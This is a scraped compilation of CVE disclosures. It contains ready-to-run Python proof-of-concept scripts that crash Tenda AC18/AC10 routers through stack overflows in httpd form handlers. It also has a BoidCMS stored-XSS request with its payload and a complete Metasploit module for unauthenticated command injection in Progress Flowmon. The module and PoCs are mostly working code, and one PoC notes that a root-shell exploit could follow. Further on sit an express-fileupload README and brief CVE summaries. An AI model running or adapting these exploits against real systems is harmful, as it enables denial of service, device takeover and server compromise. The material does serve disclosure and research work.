Tenda AC18 V15.03.05.05 is vulnerable to Buffer Overflow via function formSetDeviceName.

Permalink

Cannot retrieve contributors at this time

**Tenda AC18(V15.03.05.05) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2610.html

**Affected version**

V15.03.05.05

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetDeviceName function, which can be accessed through the URL goform/SetDeviceName.

In formSetDeviceName function, devName is controllable and will be passed into the local_1c parameter. Then local_1c will be spliced into acStack412 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os
li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')
ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x300
p2 \= b'devName=' + p1
p3 \= b"POST /goform/SetDeviceName" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111; curShow=; ac\_login\_info=passwork; test=A" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44174: IoT_vuln/Tenda_AC18_V15.03.05.05_Vuln_devName.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsStart function, which can be accessed through the URL goform/WifiWpsStart .

The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44177: IoT_vuln/Tenda/AC18/formWifiWpsStart at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetWifiGuestBasic function, which can be accessed through the URL goform/SetWifiGuestBasic.

In formSetWifiGuestBasic function, v14 is controllable and will be passed into the sub_7EA98 function. In the sub_7EA98 function, a2 will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

In set_wl_guest_qos_list function

In sub_7EA98 function

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'shareSpeed=' + p1

p3 \= b"POST /goform/SetWifiGuestBasic" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44183: IoT_vuln/Tenda/AC18/formSetWifiGuestBasic at main · RobinWang825/IoT_vuln

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/saveParentControlInfo.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/saveParentControlInfo, In saveParentControlInfo, deviceName and deviceId are controllable and will be passed into the set\_device\_name function. In the set\_device\_name function, dev\_name will be spliced into mib\_vlaue by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'deviceId=1&deviceName=' + p1

p3 \= b"POST /goform/saveParentControlInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42171: IOT_Vul/readme.md at main · z1r00/IOT_Vul

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Flowmon versions before v12.03.02.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Flowmon Unauthenticated Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in Progress Flowmon          versions before v12.03.02.        },        'Author' => [          'Dave Yesland with Rhino Security Labs',        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-2389'],          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']        ],        'DisclosureDate' => '2024-04-23',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Targets' => [['Automatic', {}]],        'Privileged' => false,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])    ])  end  def execute_command(cmd)    send_request_cgi(      'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),      'method' => 'GET',      'vars_get' => {        'file' => rand_text_alphanumeric(8),        'lang' => rand_text_alphanumeric(8),        'pluginPath' => "$(#{cmd})"      }    )  end  def exploit    print_status('Attempting to execute payload...')    execute_command(payload.encoded)  end  def check    print_status("Checking if #{peer} can be exploited!")    uri = normalize_uri(target_uri.path, 'homepage/auth/login')    res = send_request_cgi(      'uri' => uri,      'method' => 'GET'    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'    # Use a regular expression to extract the version number from the response    version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})    return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]    print_status("Detected version: #{version[1]}")    if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')      CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")    else      CheckCode::Safe("Version #{version[1]} is not vulnerable.")    end  endend

Flowmon Unauthenticated Command Injection

An arbitrary file write vulnerability in Express-FileUpload v1.3.1 allows attackers to upload multiple files with the same name, causing an overwrite of files in the web application server.

**express-fileupload**

Simple express middleware for uploading files.

![npm](https://camo.githubusercontent.com/6cdf6a999117214ddb2c9efa84c9675877635a5cb119e633c9c5853171c56627/68747470733a2f2f696d672e736869656c64732e696f2f6e706d2f762f657870726573732d66696c6575706c6f61642e737667) ![downloads per month](https://camo.githubusercontent.com/8adf05a4f289c0abf1e39815a6906d33e36b77ebe4e4b4ce93cfb7ef24105e97/687474703a2f2f696d672e736869656c64732e696f2f6e706d2f646d2f657870726573732d66696c6575706c6f61642e737667) ![CircleCI](https://camo.githubusercontent.com/730c1525f788534b709a8da897279e2a0cefc8499da1ba0ea1b649b17ffee569/68747470733a2f2f636972636c6563692e636f6d2f67682f726963686172646769726765732f657870726573732d66696c6575706c6f61642f747265652f6d61737465722e7376673f7374796c653d737667) ![Coverage Status](https://camo.githubusercontent.com/271bc75f097ec338cdfc427c163268f226dfab6792c9f3b923ece75d2fd783c2/68747470733a2f2f696d672e736869656c64732e696f2f636f766572616c6c732f726963686172646769726765732f657870726573732d66696c6575706c6f61642e737667)

**Security Notice**

Please install version 1.1.10+ of this package to avoid a security vulnerability in Node/EJS related to JS prototype pollution. This vulnerability is only applicable if you have the `parseNested` option set to `true` (it is `false` by default).

**Install**

# With NPM
npm i express-fileupload

# With Yarn
yarn add express-fileupload

**Usage**

When you upload a file, the file will be accessible from `req.files`.

Example:

*   You're uploading a file called **car.jpg**
*   Your input's name field is **foo**: `<input name="foo" type="file" />`
*   In your express server request, you can access your uploaded file from `req.files.foo`:

app.post('/upload', function(req, res) {
  console.log(req.files.foo); // the uploaded file object
});

The **req.files.foo** object will contain the following:

*   `req.files.foo.name`: "car.jpg"
*   `req.files.foo.mv`: A function to move the file elsewhere on your server. Can take a callback or return a promise.
*   `req.files.foo.mimetype`: The mimetype of your file
*   `req.files.foo.data`: A buffer representation of your file, returns empty buffer in case useTempFiles option was set to true.
*   `req.files.foo.tempFilePath`: A path to the temporary file in case useTempFiles option was set to true.
*   `req.files.foo.truncated`: A boolean that represents if the file is over the size limit
*   `req.files.foo.size`: Uploaded size in bytes
*   `req.files.foo.md5`: MD5 checksum of the uploaded file

**Notes about breaking changes with MD5 handling:**

*   Before 1.0.0, `md5` is an MD5 checksum of the uploaded file.
*   From 1.0.0 until 1.1.1, `md5` is a function to compute an MD5 hash (Read about it here.).
*   From 1.1.1 onward, `md5` is reverted back to MD5 checksum value and also added full MD5 support in case you are using temporary files.

**Examples**

*   Example Project
*   Basic File Upload
*   Multi-File Upload

**Using Busboy Options**

Pass in Busboy options directly to the express-fileupload middleware. Check out the Busboy documentation here.

app.use(fileUpload({
  limits: { fileSize: 50 \* 1024 \* 1024 },
}));

**Using useTempFile Options**

Use temp files instead of memory for managing the upload process.

// Note that this option available for versions 1.0.0 and newer. 
app.use(fileUpload({
    useTempFiles : true,
    tempFileDir : '/tmp/'
}));

**Using debug option**

You can set `debug` option to `true` to see some logging about upload process. In this case middleware uses `console.log` and adds `Express-file-upload` prefix for outputs.

It will show you whether the request is invalid and also common events triggered during upload. That can be really useful for troubleshooting and _**we recommend attaching debug output to each issue on Github**_.

_**Output example:**_

    Express-file-upload: Temporary file path is /node/express-fileupload/test/temp/tmp-16-1570084843942
    Express-file-upload: New upload started testFile->car.png, bytes:0
    Express-file-upload: Uploading testFile->car.png, bytes:21232...
    Express-file-upload: Uploading testFile->car.png, bytes:86768...
    Express-file-upload: Upload timeout testFile->car.png, bytes:86768
    Express-file-upload: Cleaning up temporary file /node/express-fileupload/test/temp/tmp-16-1570084843942...
    

_**Description:**_

*   `Temporary file path is...` says that `useTempfiles` was set to true and also shows you temp file name and path.
*   `New upload started testFile->car.png` says that new upload started with field `testFile` and file name `car.png`.
*   `Uploading testFile->car.png, bytes:21232...` shows current progress for each new data chunk.
*   `Upload timeout` means that no data came during `uploadTimeout`.
*   `Cleaning up temporary file` Here finaly we see cleaning up of the temporary file because of upload timeout reached.

**Available Options**

Pass in non-Busboy options directly to the middleware. These are express-fileupload specific options.

Option

Acceptable Values

Details

createParentPath

*   `false` **(default)**
*   `true`

Automatically creates the directory path specified in `.mv(filePathName)`

uriDecodeFileNames

*   `false` **(default)**
*   `true`

Applies uri decoding to file names if set true.

safeFileNames

*   `false` **(default)**
*   `true`
*   regex

Strips characters from the upload's filename. You can use custom regex to determine what to strip. If set to `true`, non-alphanumeric characters _except_ dashes and underscores will be stripped. This option is off by default.

**Example #1 (strip slashes from file names):** `app.use(fileUpload({ safeFileNames: /\\/g }))`  
**Example #2:** `app.use(fileUpload({ safeFileNames: true }))`

preserveExtension

*   `false` **(default)**
*   `true`
*   `_Number_`

Preserves filename extension when using `safeFileNames` option. If set to `true`, will default to an extension length of 3. If set to `_Number_`, this will be the max allowable extension length. If an extension is smaller than the extension length, it remains untouched. If the extension is longer, it is shifted.

**Example #1 (true):**  
`app.use(fileUpload({ safeFileNames: true, preserveExtension: true }));`  
_myFileName.ext_ --> _myFileName.ext_

**Example #2 (max extension length 2, extension shifted):**  
`app.use(fileUpload({ safeFileNames: true, preserveExtension: 2 }));`  
_myFileName.ext_ --> _myFileNamee.xt_

abortOnLimit

*   `false` **(default)**
*   `true`

Returns a HTTP 413 when the file is bigger than the size limit if true. Otherwise, it will add a `truncated = true` to the resulting file structure.

responseOnLimit

*   `'File size limit has been reached'` **(default)**
*   `_String_`

Response which will be send to client if file size limit exceeded when abortOnLimit set to true.

limitHandler

*   `false` **(default)**
*   `function(req, res, next)`

User defined limit handler which will be invoked if the file is bigger than configured limits.

useTempFiles

*   `false` **(default)**
*   `true`

By default this module uploads files into RAM. Setting this option to True turns on using temporary files instead of utilising RAM. This avoids memory overflow issues when uploading large files or in case of uploading lots of files at same time.

tempFileDir

*   `String` **(path)**

Path to store temporary files.  
Used along with the `useTempFiles` option. By default this module uses 'tmp' folder in the current working directory.  
You can use trailing slash, but it is not necessary.

parseNested

*   `false` **(default)**
*   `true`

By default, req.body and req.files are flattened like this: `{'name': 'John', 'hobbies[0]': 'Cinema', 'hobbies[1]': 'Bike'}`

When this option is enabled they are parsed in order to be nested like this: `{'name': 'John', 'hobbies': ['Cinema', 'Bike']}`

debug

*   `false` **(default)**
*   `true`

Turn on/off upload process logging. Can be useful for troubleshooting.

uploadTimeout

*   `60000` **(default)**
*   `Integer`

This defines how long to wait for data before aborting. Set to 0 if you want to turn off timeout checks.

**Help Wanted**

Looking for additional maintainers. Please contact `richardgirges [ at ] gmail.com` if you're interested. Pull Requests are welcome!

**Thanks & Credit**

Brian White for his stellar work on the Busboy Package and the connect-busboy Package

CVE-2022-27261: express-fileupload

The Link Library WordPress plugin before 7.2.8 does not have CSRF check when resetting library settings, allowing attackers to make a logged in admin reset arbitrary settings via a CSRF attack

CVE-2021-25092

The DW Question & Answer Pro WordPress plugin through 1.3.4 does not check that the comment to edit belongs to the user making the request, allowing any user to edit other comments.

CVE-2021-24800

In modem control device, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us